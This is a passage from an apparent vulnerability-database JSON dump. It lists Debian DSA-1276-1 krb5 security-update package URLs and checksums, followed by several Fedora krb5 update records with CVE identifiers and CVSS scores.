http://security.debian.org/pool/updates/main/k/krb5/libkrb53_1.3.6-2sarge4_s390.deb\n Size/MD5 checksum: 375998 d0817187f39c10e0ae6239768068fda6\n\n Sun Sparc architecture:\n\n http://security.debian.org/pool/updates/main/k/krb5/krb5-admin-server_1.3.6-2sarge4_sparc.deb\n Size/MD5 checksum: 92926 a69edce76b66c847fa1295ed3986ebc5\n http://security.debian.org/pool/updates/main/k/krb5/krb5-clients_1.3.6-2sarge4_sparc.deb\n Size/MD5 checksum: 194366 1d1a6b64426a5fe99fff161ff7f45b67\n http://security.debian.org/pool/updates/main/k/krb5/krb5-ftpd_1.3.6-2sarge4_sparc.deb\n Size/MD5 checksum: 53320 eadc63db311ad74434d9d1e582edc388\n http://security.debian.org/pool/updates/main/k/krb5/krb5-kdc_1.3.6-2sarge4_sparc.deb\n Size/MD5 checksum: 113856 3b8b455d4cac9e71893f3a3d429dc347\n http://security.debian.org/pool/updates/main/k/krb5/krb5-rsh-server_1.3.6-2sarge4_sparc.deb\n Size/MD5 checksum: 73390 6fabe55417081013b42c31a475be0c03\n http://security.debian.org/pool/updates/main/k/krb5/krb5-telnetd_1.3.6-2sarge4_sparc.deb\n Size/MD5 checksum: 58736 bbf17fb90fbca031e0bd7b2c7d4f4fdf\n http://security.debian.org/pool/updates/main/k/krb5/krb5-user_1.3.6-2sarge4_sparc.deb\n Size/MD5 checksum: 126594 7dbabf5abc87ea97ce29b37158902bea\n http://security.debian.org/pool/updates/main/k/krb5/libkadm55_1.3.6-2sarge4_sparc.deb\n Size/MD5 checksum: 157510 314ec42c3b66b79074527b4ff111f403\n http://security.debian.org/pool/updates/main/k/krb5/libkrb5-dev_1.3.6-2sarge4_sparc.deb\n Size/MD5 checksum: 576572 4773adc277321c64db8ef503905337cb\n http://security.debian.org/pool/updates/main/k/krb5/libkrb53_1.3.6-2sarge4_sparc.deb\n Size/MD5 checksum: 330226 1bda02fff2bd85f3dc5b77e6f045b12e\n\n\nDebian GNU/Linux 4.0 alias etch\n- --------------------------------\n\n Source archives:\n\n http://security.debian.org/pool/updates/main/k/krb5/krb5_1.4.4-7etch1.dsc\n Size/MD5 checksum: 876 3c812c5bbd93a01103c67c50a15646be\n http://security.debian.org/pool/updates/main/k/krb5/krb5_1.4.4-7etch1.diff.gz\n Size/MD5 checksum: 1585246 993d66c078ac0a5f6e29155c6973ee0a\n http://security.debian.org/pool/updates/main/k/krb5/krb5_1.4.4.orig.tar.gz\n Size/MD5 checksum: 11017910 a675e5953bb8a29b5c6eb6f4ab0bb32a\n\n Architecture independent components:\n\n http://security.debian.org/pool/updates/main/k/krb5/krb5-doc_1.4.4-7etch1_all.deb\n Size/MD5 checksum: 1811728 4b98ff8f04581e869209f96768c26ef5\n\n Alpha architecture:\n\n http://security.debian.org/pool/updates/main/k/krb5/krb5-admin-server_1.4.4-7etch1_alpha.deb\n Size/MD5 checksum: 88434 5ca7ba02beb2fddcbfbf9f84048ca219\n http://security.debian.org/pool/updates/main/k/krb5/krb5-clients_1.4.4-7etch1_alpha.deb\n Size/MD5 checksum: 245190 81df69467cc00c96a924de8b849f8ec5\n http://security.debian.org/pool/updates/main/k/krb5/krb5-ftpd_1.4.4-7etch1_alpha.deb\n Size/MD5 checksum: 65626 1a2a5981bc6cf2310a9dc71fdce6e180\n http://security.debian.org/pool/updates/main/k/krb5/krb5-kdc_1.4.4-7etch1_alpha.deb\n Size/MD5 checksum: 155128 397434d0489f812409ee8d4534fe2141\n http://security.debian.org/pool/updates/main/k/krb5/krb5-rsh-server_1.4.4-7etch1_alpha.deb\n Size/MD5 checksum: 91628 dacab2ab92c1e26132bfcb35935eec28\n http://security.debian.org/pool/updates/main/k/krb5/krb5-telnetd_1.4.4-7etch1_alpha.deb\n Size/MD5 checksum: 75554 d2880217331bbe61397d3b5dd045bb13\n http://security.debian.org/pool/updates/main/k/krb5/krb5-user_1.4.4-7etch1_alpha.deb\n Size/MD5 checksum: 136114 828e00845fc669e7825cef58c9cec6dd\n http://security.debian.org/pool/updates/main/k/krb5/libkadm55_1.4.4-7etch1_alpha.deb\n Size/MD5 checksum: 215514 bc0a173bdce02376480f427158aadf16\n http://security.debian.org/pool/updates/main/k/krb5/libkrb5-dbg_1.4.4-7etch1_alpha.deb\n Size/MD5 checksum: 1087954 f08cf12afeb09b686664ba4bbdbc6e6f\n http://security.debian.org/pool/updates/main/k/krb5/libkrb5-dev_1.4.4-7etch1_alpha.deb\n Size/MD5 checksum: 1016210 2d6aa3be0378d47c3bdfd4890528b9bc\n http://security.debian.org/pool/updates/main/k/krb5/libkrb53_1.4.4-7etch1_alpha.deb\n Size/MD5 checksum: 460824 ee08102f7307b3b152a25d8e5e8834de\n\n AMD64 architecture:\n\n http://security.debian.org/pool/updates/main/k/krb5/krb5-admin-server_1.4.4-7etch1_amd64.deb\n Size/MD5 checksum: 83232 d50f8cbf4cf16b0c4bf20829b98eb7ed\n http://security.debian.org/pool/updates/main/k/krb5/krb5-clients_1.4.4-7etch1_amd64.deb\n Size/MD5 checksum: 221464 897e368902360004511bd0ace9294b6b\n http://security.debian.org/pool/updates/main/k/krb5/krb5-ftpd_1.4.4-7etch1_amd64.deb\n Size/MD5 checksum: 61692 f5710c9fba60636c96c08a8b3af2045b\n http://security.debian.org/pool/updates/main/k/krb5/krb5-kdc_1.4.4-7etch1_amd64.deb\n Size/MD5 checksum: 141842 b591951657a5de1cff50b2ce3cb037ef\n http://security.debian.org/pool/updates/main/k/krb5/krb5-rsh-server_1.4.4-7etch1_amd64.deb\n Size/MD5 checksum: 86268 55e365893b4a6b890dcb6d2a701d92c0\n http://security.debian.org/pool/updates/main/k/krb5/krb5-telnetd_1.4.4-7etch1_amd64.deb\n Size/MD5 checksum: 67792 b8d3d3cce462df24c2b2d36293bff5b0\n http://security.debian.org/pool/updates/main/k/krb5/krb5-user_1.4.4-7etch1_amd64.deb\n Size/MD5 checksum: 130876 634099f9ec167301dbe7d55be7882b30\n http://security.debian.org/pool/updates/main/k/krb5/libkadm55_1.4.4-7etch1_amd64.deb\n Size/MD5 checksum: 190056 83c6b167a3fa6d5af25b981e9ad47418\n http://security.debian.org/pool/updates/main/k/krb5/libkrb5-dbg_1.4.4-7etch1_amd64.deb\n Size/MD5 checksum: 1070450 42fb6e4373b61a8fd0e744a2ea9d0b5a\n http://security.debian.org/pool/updates/main/k/krb5/libkrb5-dev_1.4.4-7etch1_amd64.deb\n Size/MD5 checksum: 766758 2fbf76c7d63c88839fdc71501dc21107\n http://security.debian.org/pool/updates/main/k/krb5/libkrb53_1.4.4-7etch1_amd64.deb\n Size/MD5 checksum: 426686 424b59294000ebde26a5251973f5fdf0\n\n ARM architecture:\n\n http://security.debian.org/pool/updates/main/k/krb5/krb5-admin-server_1.4.4-7etch1_arm.deb\n Size/MD5 checksum: 78082 9f47347dd2c6c65f52319c97e45ff462\n http://security.debian.org/pool/updates/main/k/krb5/krb5-clients_1.4.4-7etch1_arm.deb\n Size/MD5 checksum: 200186 2566c1b226be25441db26c5d312b421d\n http://security.debian.org/pool/updates/main/k/krb5/krb5-ftpd_1.4.4-7etch1_arm.deb\n Size/MD5 checksum: 58856 6fea432a5624a157b1f0a3731e0d173d\n http://security.debian.org/pool/updates/main/k/krb5/krb5-kdc_1.4.4-7etch1_arm.deb\n Size/MD5 checksum: 135606 4345140a428908b37d6f5273e3ed7da1\n http://security.debian.org/pool/updates/main/k/krb5/krb5-rsh-server_1.4.4-7etch1_arm.deb\n Size/MD5 checksum: 80608 4bbb3a3641e44b8bb9a4fc1c5d083102\n http://security.debian.org/pool/updates/main/k/krb5/krb5-telnetd_1.4.4-7etch1_arm.deb\n Size/MD5 checksum: 62926 09c3cc3ea6b9a1499e0e9dfcdecafb05\n http://security.debian.org/pool/updates/main/k/krb5/krb5-user_1.4.4-7etch1_arm.deb\n Size/MD5 checksum: 124706 4e690e5c6c4c7e7da5740b9c0f12af9f\n http://security.debian.org/pool/updates/main/k/krb5/libkadm55_1.4.4-7etch1_arm.deb\n Size/MD5 checksum: 172264 0e1298d461128f9c647c739653326c19\n http://security.debian.org/pool/updates/main/k/krb5/libkrb5-dbg_1.4.4-7etch1_arm.deb\n Size/MD5 checksum: 1013022 b57238d456f3beaa0d0dbf2b62442a86\n http://security.debian.org/pool/updates/main/k/krb5/libkrb5-dev_1.4.4-7etch1_arm.deb\n Size/MD5 checksum: 681790 fb4d986cd2e8d12fa04b5913ed5a38e2\n http://security.debian.org/pool/updates/main/k/krb5/libkrb53_1.4.4-7etch1_arm.deb\n Size/MD5 checksum: 390064 c0b4815bfbeeb5b4886f2a52b550c158\n\n HP Precision architecture:\n\n http://security.debian.org/pool/updates/main/k/krb5/krb5-admin-server_1.4.4-7etch1_hppa.deb\n Size/MD5 checksum: 85030 0a6fadd801b186eb594ee5fec5f401c4\n http://security.debian.org/pool/updates/main/k/krb5/krb5-clients_1.4.4-7etch1_hppa.deb\n Size/MD5 checksum: 233036 6b3f03fe726f0ed08fe54a997fca6012\n http://security.debian.org/pool/updates/main/k/krb5/krb5-ftpd_1.4.4-7etch1_hppa.deb\n Size/MD5 checksum: 63682 f9a4f7714fe441c4ce9ab5b08dcc5446\n http://security.debian.org/pool/updates/main/k/krb5/krb5-kdc_1.4.4-7etch1_hppa.deb\n Size/MD5 checksum: 145346 b423ae82b93e9192480a237c0ed14c43\n http://security.debian.org/pool/updates/main/k/krb5/krb5-rsh-server_1.4.4-7etch1_hppa.deb\n Size/MD5 checksum: 87070 96b79066e9a1c2e91de4783971d25457\n http://security.debian.org/pool/updates/main/k/krb5/krb5-telnetd_1.4.4-7etch1_hppa.deb\n Size/MD5 checksum: 69974 9f95f8d5d61d4b596e0ff740b8a61990\n http://security.debian.org/pool/updates/main/k/krb5/krb5-user_1.4.4-7etch1_hppa.deb\n Size/MD5 checksum: 132890 99be96f336b52ddcadb81ef08422982f\n http://security.debian.org/pool/updates/main/k/krb5/libkadm55_1.4.4-7etch1_hppa.deb\n Size/MD5 checksum: 201956 c78e66940879478a4aeccd3177d60965\n http://security.debian.org/pool/updates/main/k/krb5/libkrb5-dbg_1.4.4-7etch1_hppa.deb\n Size/MD5 checksum: 1082124 add0f1588ae943d85ec7a2b90a3a1b1d\n http://security.debian.org/pool/updates/main/k/krb5/libkrb5-dev_1.4.4-7etch1_hppa.deb\n Size/MD5 checksum: 815700 0ee7af18e38f9d8eabbef99c03435fbf\n http://security.debian.org/pool/updates/main/k/krb5/libkrb53_1.4.4-7etch1_hppa.deb\n Size/MD5 checksum: 437480 f960e56a29b1eb2061d1bc2ef0134990\n\n Intel IA-32 architecture:\n\n http://security.debian.org/pool/updates/main/k/krb5/krb5-admin-server_1.4.4-7etch1_i386.deb\n Size/MD5 checksum: 78004 076140c9d3df111148f259a0c1aa2d34\n http://security.debian.org/pool/updates/main/k/krb5/krb5-clients_1.4.4-7etch1_i386.deb\n Size/MD5 checksum: 196088 40cc5fc641d24fb1cb54d3aba24e51b0\n http://security.debian.org/pool/updates/main/k/krb5/krb5-ftpd_1.4.4-7etch1_i386.deb\n Size/MD5 checksum: 57822 20aabab63e0976d38f0a72e9fa1f42d2\n http://security.debian.org/pool/updates/main/k/krb5/krb5-kdc_1.4.4-7etch1_i386.deb\n Size/MD5 checksum: 132828 cef966062845545c71f5a6f84e6fdfc4\n http://security.debian.org/pool/updates/main/k/krb5/krb5-rsh-server_1.4.4-7etch1_i386.deb\n Size/MD5 checksum: 79888 5bda94c68e5368047ed93665c734ec80\n http://security.debian.org/pool/updates/main/k/krb5/krb5-telnetd_1.4.4-7etch1_i386.deb\n Size/MD5 checksum: 62008 17c4607112e571b22f95aa174502998c\n http://security.debian.org/pool/updates/main/k/krb5/krb5-user_1.4.4-7etch1_i386.deb\n Size/MD5 checksum: 123794 2c0f795975289fdfc4254852ac5fe1c5\n http://security.debian.org/pool/updates/main/k/krb5/libkadm55_1.4.4-7etch1_i386.deb\n Size/MD5 checksum: 173608 a2f67bd332d2bc90732536606fb5af89\n http://security.debian.org/pool/updates/main/k/krb5/libkrb5-dbg_1.4.4-7etch1_i386.deb\n Size/MD5 checksum: 1037458 35fc79a9574582d3dc70e2e582300fce\n http://security.debian.org/pool/updates/main/k/krb5/libkrb5-dev_1.4.4-7etch1_i386.deb\n Size/MD5 checksum: 679676 24d0bb8fea2a924b395126204448ea34\n http://security.debian.org/pool/updates/main/k/krb5/libkrb53_1.4.4-7etch1_i386.deb\n Size/MD5 checksum: 407958 6173bc1bb4e1ca40b911036ec34488c3\n\n Intel IA-64 architecture:\n\n http://security.debian.org/pool/updates/main/k/krb5/krb5-admin-server_1.4.4-7etch1_ia64.deb\n Size/MD5 checksum: 104552 a5a8255ba3e2b3fc21f11c2844538800\n http://security.debian.org/pool/updates/main/k/krb5/krb5-clients_1.4.4-7etch1_ia64.deb\n Size/MD5 checksum: 305498 e3fecfb7741fb3e6058244e6a56b7237\n http://security.debian.org/pool/updates/main/k/krb5/krb5-ftpd_1.4.4-7etch1_ia64.deb\n Size/MD5 checksum: 79880 289c3b2666f36cb3766f3ab8d5391e9c\n http://security.debian.org/pool/updates/main/k/krb5/krb5-kdc_1.4.4-7etch1_ia64.deb\n Size/MD5 checksum: 190176 1d848b0c7a55d2eecce4d8d0be2dd74b\n http://security.debian.org/pool/updates/main/k/krb5/krb5-rsh-server_1.4.4-7etch1_ia64.deb\n Size/MD5 checksum: 112790 81d40d9e2b79f146aa62f26b70dffe14\n http://security.debian.org/pool/updates/main/k/krb5/krb5-telnetd_1.4.4-7etch1_ia64.deb\n Size/MD5 checksum: 90890 b5088c38a3147cf5fdea4d86a83d7526\n http://security.debian.org/pool/updates/main/k/krb5/krb5-user_1.4.4-7etch1_ia64.deb\n Size/MD5 checksum: 164250 cc94e602ea7fb7f781d9c0b4a0953cdd\n http://security.debian.org/pool/updates/main/k/krb5/libkadm55_1.4.4-7etch1_ia64.deb\n Size/MD5 checksum: 269080 4c61477739f1f8cb1906c9d582d4699b\n http://security.debian.org/pool/updates/main/k/krb5/libkrb5-dbg_1.4.4-7etch1_ia64.deb\n Size/MD5 checksum: 1043550 1361e14de88ea0f06f9f94f2433736e7\n http://security.debian.org/pool/updates/main/k/krb5/libkrb5-dev_1.4.4-7etch1_ia64.deb\n Size/MD5 checksum: 1087968 dde40a86752c0a1d549dd358740b1248\n http://security.debian.org/pool/updates/main/k/krb5/libkrb53_1.4.4-7etch1_ia64.deb\n Size/MD5 checksum: 591780 0a558256583049515c5bbaa3e0015771\n\n Motorola 680x0 architecture:\n\n http://security.debian.org/pool/updates/main/k/krb5/krb5-admin-server_1.4.4-7etch1_m68k.deb\n Size/MD5 checksum: 75800 a81baf70fa083dfef189546a571c1054\n http://security.debian.org/pool/updates/main/k/krb5/krb5-clients_1.4.4-7etch1_m68k.deb\n Size/MD5 checksum: 185900 47ae833d77d72d094489132a05c062a3\n http://security.debian.org/pool/updates/main/k/krb5/krb5-ftpd_1.4.4-7etch1_m68k.deb\n Size/MD5 checksum: 54810 a47b977cafcd7613cdfe987e60d2a556\n http://security.debian.org/pool/updates/main/k/krb5/krb5-kdc_1.4.4-7etch1_m68k.deb\n Size/MD5 checksum: 126756 84907221e15e69b91138c5f8c24dfe1a\n http://security.debian.org/pool/updates/main/k/krb5/krb5-rsh-server_1.4.4-7etch1_m68k.deb\n Size/MD5 checksum: 76466 3a046bfa740fbfd0bd38bc799170ce9d\n http://security.debian.org/pool/updates/main/k/krb5/krb5-telnetd_1.4.4-7etch1_m68k.deb\n Size/MD5 checksum: 59326 2994d0afb8be81f6948885fdb04b3d8b\n http://security.debian.org/pool/updates/main/k/krb5/krb5-user_1.4.4-7etch1_m68k.deb\n Size/MD5 checksum: 119948 de0adcd99a920f5a96f3e02090f444f8\n http://security.debian.org/pool/updates/main/k/krb5/libkadm55_1.4.4-7etch1_m68k.deb\n Size/MD5 checksum: 161758 d07584193ec131a60b585c19a68f01b7\n http://security.debian.org/pool/updates/main/k/krb5/libkrb5-dbg_1.4.4-7etch1_m68k.deb\n Size/MD5 checksum: 1041254 f7012755499421834b7f9a5e1bd67f1f\n http://security.debian.org/pool/updates/main/k/krb5/libkrb5-dev_1.4.4-7etch1_m68k.deb\n Size/MD5 checksum: 627120 b545cb956265bf549d0767787bbf934a\n http://security.debian.org/pool/updates/main/k/krb5/libkrb53_1.4.4-7etch1_m68k.deb\n Size/MD5 checksum: 361220 98181efd2e6014f1bf4a58c4d17ed49c\n\n Big endian MIPS architecture:\n\n http://security.debian.org/pool/updates/main/k/krb5/krb5-admin-server_1.4.4-7etch1_mips.deb\n Size/MD5 checksum: 81788 e2f03d1b02e723bced497d6bbd47ee7e\n http://security.debian.org/pool/updates/main/k/krb5/krb5-clients_1.4.4-7etch1_mips.deb\n Size/MD5 checksum: 232444 c3334a3c6afbd7bb81af678d4126cb0b\n http://security.debian.org/pool/updates/main/k/krb5/krb5-ftpd_1.4.4-7etch1_mips.deb\n Size/MD5 checksum: 63202 8dfde15398248978789df7ea6f180f46\n http://security.debian.org/pool/updates/main/k/krb5/krb5-kdc_1.4.4-7etch1_mips.deb\n Size/MD5 checksum: 144670 de9dd221a1a12b06ae9a7b7bc9f5153f\n http://security.debian.org/pool/updates/main/k/krb5/krb5-rsh-server_1.4.4-7etch1_mips.deb\n Size/MD5 checksum: 86696 8bc48330d1d8ad77d1ee1ccbf8b02e8d\n http://security.debian.org/pool/updates/main/k/krb5/krb5-telnetd_1.4.4-7etch1_mips.deb\n Size/MD5 checksum: 71486 e4a3f3270f71f0a76d7fdaa9d36331b5\n http://security.debian.org/pool/updates/main/k/krb5/krb5-user_1.4.4-7etch1_mips.deb\n Size/MD5 checksum: 130830 507773b943e7087e56e89fcadb257a1a\n http://security.debian.org/pool/updates/main/k/krb5/libkadm55_1.4.4-7etch1_mips.deb\n Size/MD5 checksum: 176974 d824dbeab78da40c6275af446546dd1b\n http://security.debian.org/pool/updates/main/k/krb5/libkrb5-dbg_1.4.4-7etch1_mips.deb\n Size/MD5 checksum: 1113114 163bf4a202ac94d5ff7e678b85f14823\n http://security.debian.org/pool/updates/main/k/krb5/libkrb5-dev_1.4.4-7etch1_mips.deb\n Size/MD5 checksum: 807398 200892d4c1cd1a19878806c11a1f4cac\n http://security.debian.org/pool/updates/main/k/krb5/libkrb53_1.4.4-7etch1_mips.deb\n Size/MD5 checksum: 389706 4d44a5b63fdfb59524304a3d611a4096\n\n Little endian MIPS architecture:\n\n http://security.debian.org/pool/updates/main/k/krb5/krb5-admin-server_1.4.4-7etch1_mipsel.deb\n Size/MD5 checksum: 81768 26f7588b5b219c0f56b2efef37bed2a6\n http://security.debian.org/pool/updates/main/k/krb5/krb5-clients_1.4.4-7etch1_mipsel.deb\n Size/MD5 checksum: 232318 b719c6f2994d95962e5123684066b8ac\n http://security.debian.org/pool/updates/main/k/krb5/krb5-ftpd_1.4.4-7etch1_mipsel.deb\n Size/MD5 checksum: 63386 3f4cf77845617291c6ea5e6b04ce6d76\n http://security.debian.org/pool/updates/main/k/krb5/krb5-kdc_1.4.4-7etch1_mipsel.deb\n Size/MD5 checksum: 145438 9c804ffffbcb84b7730b9989e1d925c9\n http://security.debian.org/pool/updates/main/k/krb5/krb5-rsh-server_1.4.4-7etch1_mipsel.deb\n Size/MD5 checksum: 87024 a27a367cfc8cdc810a2143c53e16c05b\n http://security.debian.org/pool/updates/main/k/krb5/krb5-telnetd_1.4.4-7etch1_mipsel.deb\n Size/MD5 checksum: 71150 ae1b043223774f7eebb6ed29ab003385\n http://security.debian.org/pool/updates/main/k/krb5/krb5-user_1.4.4-7etch1_mipsel.deb\n Size/MD5 checksum: 130712 768d4504c6613ee3964f24e70713a078\n http://security.debian.org/pool/updates/main/k/krb5/libkadm55_1.4.4-7etch1_mipsel.deb\n Size/MD5 checksum: 178972 af710061d15e4a2f3ea13a676c5d27bf\n http://security.debian.org/pool/updates/main/k/krb5/libkrb5-dbg_1.4.4-7etch1_mipsel.deb\n Size/MD5 checksum: 1087052 df8b16bdfea146b4d62752b759d9f6a1\n http://security.debian.org/pool/updates/main/k/krb5/libkrb5-dev_1.4.4-7etch1_mipsel.deb\n Size/MD5 checksum: 809872 3067d34aeaba3a5f3fdc231d150aab11\n http://security.debian.org/pool/updates/main/k/krb5/libkrb53_1.4.4-7etch1_mipsel.deb\n Size/MD5 checksum: 391374 f323cf30035d38920e3f347c1e42d9ae\n\n PowerPC architecture:\n\n http://security.debian.org/pool/updates/main/k/krb5/krb5-admin-server_1.4.4-7etch1_powerpc.deb\n Size/MD5 checksum: 83662 0ec431ef213ed44d9f2e0a8c86ea0793\n http://security.debian.org/pool/updates/main/k/krb5/krb5-clients_1.4.4-7etch1_powerpc.deb\n Size/MD5 checksum: 222362 0c13e94ab95475f49a0d65f33899721a\n http://security.debian.org/pool/updates/main/k/krb5/krb5-ftpd_1.4.4-7etch1_powerpc.deb\n Size/MD5 checksum: 61506 050e2815aadcd13f01d4dd243c3d501b\n http://security.debian.org/pool/updates/main/k/krb5/krb5-kdc_1.4.4-7etch1_powerpc.deb\n Size/MD5 checksum: 143496 b9e873e1d6a1c38190619d84a2779015\n http://security.debian.org/pool/updates/main/k/krb5/krb5-rsh-server_1.4.4-7etch1_powerpc.deb\n Size/MD5 checksum: 86438 f13f7a761fec58897096c7606ffb3c11\n http://security.debian.org/pool/updates/main/k/krb5/krb5-telnetd_1.4.4-7etch1_powerpc.deb\n Size/MD5 checksum: 66954 15a97efcab1d560d1b436dbbcd0799af\n http://security.debian.org/pool/updates/main/k/krb5/krb5-user_1.4.4-7etch1_powerpc.deb\n Size/MD5 checksum: 136864 77baa09629e3418e25a1b9309faed7f8\n http://security.debian.org/pool/updates/main/k/krb5/libkadm55_1.4.4-7etch1_powerpc.deb\n Size/MD5 checksum: 179070 7c22c5381a6b2ad4450c078475867e45\n http://security.debian.org/pool/updates/main/k/krb5/libkrb5-dbg_1.4.4-7etch1_powerpc.deb\n Size/MD5 checksum: 1082734 28110be9d998374a13ac90bffdf5d69b\n http://security.debian.org/pool/updates/main/k/krb5/libkrb5-dev_1.4.4-7etch1_powerpc.deb\n Size/MD5 checksum: 752980 eba363ffb3d68112e352a04b03ed4159\n http://security.debian.org/pool/updates/main/k/krb5/libkrb53_1.4.4-7etch1_powerpc.deb\n Size/MD5 checksum: 398944 49c9f53598050ba31f9f7daecdf5fba1\n\n IBM S/390 architecture:\n\n http://security.debian.org/pool/updates/main/k/krb5/krb5-admin-server_1.4.4-7etch1_s390.deb\n Size/MD5 checksum: 81470 b206121253cf849da5adc883fe2de83d\n http://security.debian.org/pool/updates/main/k/krb5/krb5-clients_1.4.4-7etch1_s390.deb\n Size/MD5 checksum: 224016 17c538830bc57f68a80ed4a83a2c17f0\n http://security.debian.org/pool/updates/main/k/krb5/krb5-ftpd_1.4.4-7etch1_s390.deb\n Size/MD5 checksum: 62954 bebdaa3a20790e96bf2f3edfc3a4ab59\n http://security.debian.org/pool/updates/main/k/krb5/krb5-kdc_1.4.4-7etch1_s390.deb\n Size/MD5 checksum: 139942 e05d45fb378992714002d2fbe3575416\n http://security.debian.org/pool/updates/main/k/krb5/krb5-rsh-server_1.4.4-7etch1_s390.deb\n Size/MD5 checksum: 87440 f9fd7fef9c3438c1c7ffab1d3fd3a2c5\n http://security.debian.org/pool/updates/main/k/krb5/krb5-telnetd_1.4.4-7etch1_s390.deb\n Size/MD5 checksum: 68342 c835d99dc1a13916ae406c637bf73631\n http://security.debian.org/pool/updates/main/k/krb5/krb5-user_1.4.4-7etch1_s390.deb\n Size/MD5 checksum: 128864 3e0a54d046c4f64a7a2118a7b7c1fe4a\n http://security.debian.org/pool/updates/main/k/krb5/libkadm55_1.4.4-7etch1_s390.deb\n Size/MD5 checksum: 194966 a5281dc23bea7994f619760348316aba\n http://security.debian.org/pool/updates/main/k/krb5/libkrb5-dbg_1.4.4-7etch1_s390.deb\n Size/MD5 checksum: 1073124 8ca6062dc9748735d7186c099cf16d2e\n http://security.debian.org/pool/updates/main/k/krb5/libkrb5-dev_1.4.4-7etch1_s390.deb\n Size/MD5 checksum: 732972 fbcdc91f99d841f99d778aa2116697ed\n http://security.debian.org/pool/updates/main/k/krb5/libkrb53_1.4.4-7etch1_s390.deb\n Size/MD5 checksum: 438532 2607ba683fbf8c1b7e6d15dfd583f8ea\n\n Sun Sparc architecture:\n\n http://security.debian.org/pool/updates/main/k/krb5/krb5-admin-server_1.4.4-7etch1_sparc.deb\n Size/MD5 checksum: 76460 66edc360022f7952d4df9a52818aeead\n http://security.debian.org/pool/updates/main/k/krb5/krb5-clients_1.4.4-7etch1_sparc.deb\n Size/MD5 checksum: 199800 b3f30d39d1a4aa7b04b5c5d574255fdb\n http://security.debian.org/pool/updates/main/k/krb5/krb5-ftpd_1.4.4-7etch1_sparc.deb\n Size/MD5 checksum: 57792 b20a483e3733783e50bcf3f129c3c6c4\n http://security.debian.org/pool/updates/main/k/krb5/krb5-kdc_1.4.4-7etch1_sparc.deb\n Size/MD5 checksum: 131320 5bafed0bdcf638d747e0fa0c11343608\n http://security.debian.org/pool/updates/main/k/krb5/krb5-rsh-server_1.4.4-7etch1_sparc.deb\n Size/MD5 checksum: 77778 3531ee2320e1766ad4f955d1e037907b\n http://security.debian.org/pool/updates/main/k/krb5/krb5-telnetd_1.4.4-7etch1_sparc.deb\n Size/MD5 checksum: 63360 78bba2c3b9fae6dfaf7a23ddcd66c28c\n http://security.debian.org/pool/updates/main/k/krb5/krb5-user_1.4.4-7etch1_sparc.deb\n Size/MD5 checksum: 122674 efbcac04e0d2aef2c4995ead413140be\n http://security.debian.org/pool/updates/main/k/krb5/libkadm55_1.4.4-7etch1_sparc.deb\n Size/MD5 checksum: 166156 a5b3a968d0d8f807cd5d9a95f12dc4cd\n http://security.debian.org/pool/updates/main/k/krb5/libkrb5-dbg_1.4.4-7etch1_sparc.deb\n Size/MD5 checksum: 961308 c3d4084b1295e84e1e8a615151a9b2d0\n http://security.debian.org/pool/updates/main/k/krb5/libkrb5-dev_1.4.4-7etch1_sparc.deb\n Size/MD5 checksum: 679936 e44ec1e4e41e162a5b3cc6e190260fdc\n http://security.debian.org/pool/updates/main/k/krb5/libkrb53_1.4.4-7etch1_sparc.deb\n Size/MD5 checksum: 372204 a7ec5df178d138eb4cf8e31402970bfd\n\n These files will probably be moved into the stable distribution on\n its next update.\n\n- ---------------------------------------------------------------------------------\nFor apt-get: deb http://security.debian.org/ stable/updates main\nFor dpkg-ftp: ftp://security.debian.org/debian-security dists/stable/updates/main\nMailing list: debian-security-announce@lists.debian.org\nPackage info: `apt-cache show <pkg>' and http://packages.debian.org/<pkg>\n", "edition": 3, "modified": "2007-04-03T00:00:00", "published": "2007-04-03T00:00:00", "id": "DEBIAN:DSA-1276-1:C7435", "href": "https://lists.debian.org/debian-security-announce/debian-security-announce-2007/msg00032.html", "title": "[SECURITY] [DSA 1276-1] New krb5 packages fix several vulnerabilities", "type": "debian", "cvss": {"score": 9.0, "vector": "AV:N/AC:L/Au:S/C:C/I:C/A:C"}}], "fedora": [{"lastseen": "2020-12-21T08:17:48", "bulletinFamily": "unix", "cvelist": ["CVE-2007-0956", "CVE-2007-0957", "CVE-2007-1216"], "description": "Kerberos V5 is a trusted-third-party network authentication system, which can improve your network's security by eliminating the insecure practice of cleartext passwords. ", "modified": "2007-04-03T20:13:33", "published": "2007-04-03T20:13:33", "id": "FEDORA:L33KDXBF030697", "href": "", "type": "fedora", "title": "[SECURITY] Fedora Core 6 Update: krb5-1.5-21", "cvss": {"score": 9.0, "vector": "AV:N/AC:L/Au:S/C:C/I:C/A:C"}}, {"lastseen": "2020-12-21T08:17:48", "bulletinFamily": "unix", "cvelist": ["CVE-2006-3084", "CVE-2006-6143", "CVE-2007-0956", "CVE-2007-0957", "CVE-2007-1216"], "description": "Kerberos V5 is a trusted-third-party network authentication system, which can improve your network's security by eliminating the insecure practice of cleartext passwords. ", "modified": "2007-04-03T20:14:48", "published": "2007-04-03T20:14:48", "id": "FEDORA:L33KEM7F031094", "href": "", "type": "fedora", "title": "[SECURITY] Fedora Core 5 Update: krb5-1.4.3-5.4", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2020-12-21T08:17:48", "bulletinFamily": "unix", "cvelist": ["CVE-2007-0956", "CVE-2007-0957", "CVE-2007-2442", "CVE-2007-2443", "CVE-2007-2798"], "description": "Kerberos V5 is a trusted-third-party network authentication system, which can improve your network's security by eliminating the insecure practice of cleartext passwords. ", "modified": "2007-06-28T01:54:45", "published": "2007-06-28T01:54:45", "id": "FEDORA:L5S1SAHC031057", "href": "", "type": "fedora", "title": "[SECURITY] Fedora 7 Update: krb5-1.6.1-2.1.fc7", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2020-12-21T08:17:48", "bulletinFamily": "unix", "cvelist": ["CVE-2007-0956", "CVE-2007-0957", "CVE-2007-2442", "CVE-2007-2443", "CVE-2007-2798", "CVE-2007-3999", "CVE-2007-4000"], "description": "Kerberos V5 is a trusted-third-party network authentication system, which can improve your network's security by eliminating the insecure practice of cleartext passwords. ", "modified": "2007-09-04T22:14:03", "published": "2007-09-04T22:14:03", "id": "FEDORA:L84MDMEP030074", "href": "", "type": "fedora", "title": "[SECURITY] Fedora 7 Update: krb5-1.6.1-3.fc7", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2020-12-21T08:17:48", "bulletinFamily": "unix", "cvelist": ["CVE-2007-0956", "CVE-2007-0957", "CVE-2007-2442", "CVE-2007-2443", "CVE-2007-2798", "CVE-2007-3999", "CVE-2007-4000", 